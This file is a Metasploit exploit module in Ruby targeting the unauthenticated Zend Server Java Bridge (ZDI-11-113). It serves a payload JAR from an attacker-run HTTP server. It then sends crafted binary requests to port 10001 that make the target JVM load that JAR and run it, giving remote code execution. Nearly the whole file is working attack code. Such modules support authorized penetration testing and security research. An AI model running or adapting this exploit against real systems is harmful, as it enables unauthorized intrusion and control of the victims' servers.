Path: blob/master/modules/exploits/multi/misc/zend_java_bridge.rb
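##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::Remote::Tcp

  # Method / class names carried in the Java Bridge requests below. Each is
  # sent on the wire preceded by its length, so the length words are derived
  # from these strings instead of being hard-coded.
  REQUIRE_METHOD = 'setAdditionalClassPath'.freeze
  CREATE_METHOD = 'CreateObject'.freeze
  PAYLOAD_CLASS = 'metasploit.Payload'.freeze
  MAIN_METHOD = 'main'.freeze

  # The class-path string is length-prefixed with a single byte, so the URI
  # we hand to the bridge cannot exceed this many characters.
  MAX_PATH_LEN = 0xff

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Zend Server Java Bridge Arbitrary Java Code Execution',
        'Description' => %q{
          This module takes advantage of a trust relationship issue within the
          Zend Server Java Bridge. The Java Bridge is responsible for handling interactions
          between PHP and Java code within Zend Server.

          When Java code is encountered Zend Server communicates with the Java Bridge. The
          Java Bridge then handles the java code and creates the objects within the Java Virtual
          Machine. This interaction however, does not require any sort of authentication. This
          leaves the JVM wide open to remote attackers. Sending specially crafted data to the
          Java Bridge results in the execution of arbitrary java code.
        },
        'Author' => [ 'bannedit' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'OSVDB', '71420'],
          [ 'ZDI', '11-113'],
          [ 'EDB', '17078' ],
        ],
        'Platform' => ['java'], # win
        'Arch' => ARCH_JAVA,
        'Privileged' => true,
        'Targets' => [
          [ 'Linux', {}],
          [ 'Windows', {}],
        ],
        'DisclosureDate' => '2011-03-28',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
    register_options([ Opt::RPORT(10001) ])
  end

  # Entry point. Starts the HTTP server that serves the payload JAR, then
  # drives the Java Bridge over the TCP socket on RPORT. The bridge socket is
  # always closed on the way out; previously it was left open after handler().
  def exploit
    start_service
    send_java_require
  ensure
    disconnect
  end

  # First bridge request: ask the JVM to add our HTTP server (a random
  # *.jar name under the module's URI) to its class path. The bridge is
  # expected to fetch the JAR through on_request_uri.
  #
  # Raises via fail_with when the served URI does not fit in the one-byte
  # length field; pack('C') would otherwise silently truncate it.
  def send_java_require
    connect

    jar = rand_text_alpha(rand(1..8)) + '.jar'
    path = get_uri + '/' + jar

    if path.length > MAX_PATH_LEN
      fail_with(Failure::BadConfig,
                "Payload URI is #{path.length} characters; the bridge request only carries #{MAX_PATH_LEN}")
    end

    # Wire layout (after the 4-byte big-endian total length prefix):
    #   0xffffffff, then length-prefixed method name, two opaque words kept
    #   exactly as originally observed, then the one-byte-length-prefixed URI.
    body = [0xffffffff].pack('N') +
      [REQUIRE_METHOD.length].pack('N') + REQUIRE_METHOD +
      [0x01000000, 0x00000004].pack('V*') +
      [path.length].pack('C') + path
    request = [body.length].pack('N') + body

    print_status("Sending java_require() request... #{path}")
    sock.put(request)
    sock.get_once # drain the bridge's reply; its contents are not used here

    select(nil, nil, nil, 5) # wait for the request to be handled
    create_and_exec
  end

  # Second and third bridge requests: CreateObject for the payload class, then
  # invoke main() on the returned object id, then hand off to the handler.
  #
  # Raises via fail_with when the CreateObject reply is missing or too short
  # to contain an object id (a closed connection used to raise NoMethodError
  # on the nil reply; a short reply produced a truncated id).
  def create_and_exec
    print_status("Sending Final Java Bridge Requests")

    create_body =
      [0x00000000].pack('N') +
      [CREATE_METHOD.length].pack('N') + CREATE_METHOD +
      [0x02000000, 0x00000004].pack('V*') +
      [PAYLOAD_CLASS.length].pack('C') + PAYLOAD_CLASS +
      [0x07000000].pack('N') + [0x00].pack('C')
    create_obj = [create_body.length].pack('N') + create_body

    sock.put(create_obj)
    res = sock.get_once

    # The object id is the 4 bytes at offset 5 of the reply.
    if res.nil? || res.length < 9
      fail_with(Failure::UnexpectedReply, 'No usable reply to CreateObject from the Java Bridge')
    end
    obj_id = res[5, 4]

    call_body =
      obj_id + [MAIN_METHOD.length].pack('N') + MAIN_METHOD +
      [0x01000000, 0x00000008, 0x00000201, 0x00040000].pack('V*') +
      [0x00, 0x00, 0x00].pack('C*')
    callmain = [call_body.length].pack('N') + call_body

    sock.put(callmain)
    sock.get_once
    handler
  end

  # HTTP server callback: any request whose path ends in .jar receives the
  # encoded Java payload; everything else is ignored. Anchored with \z so a
  # trailing newline cannot satisfy the match.
  def on_request_uri(cli, request)
    return unless request.uri =~ /\.jar\z/i

    send_response(cli, payload.encoded,
      {
        'Content-Type' => 'application/java-archive',
        'Connection' => 'close',
        'Pragma' => 'no-cache'
      })

    print_status("Replied to Request for Payload JAR")
  end
end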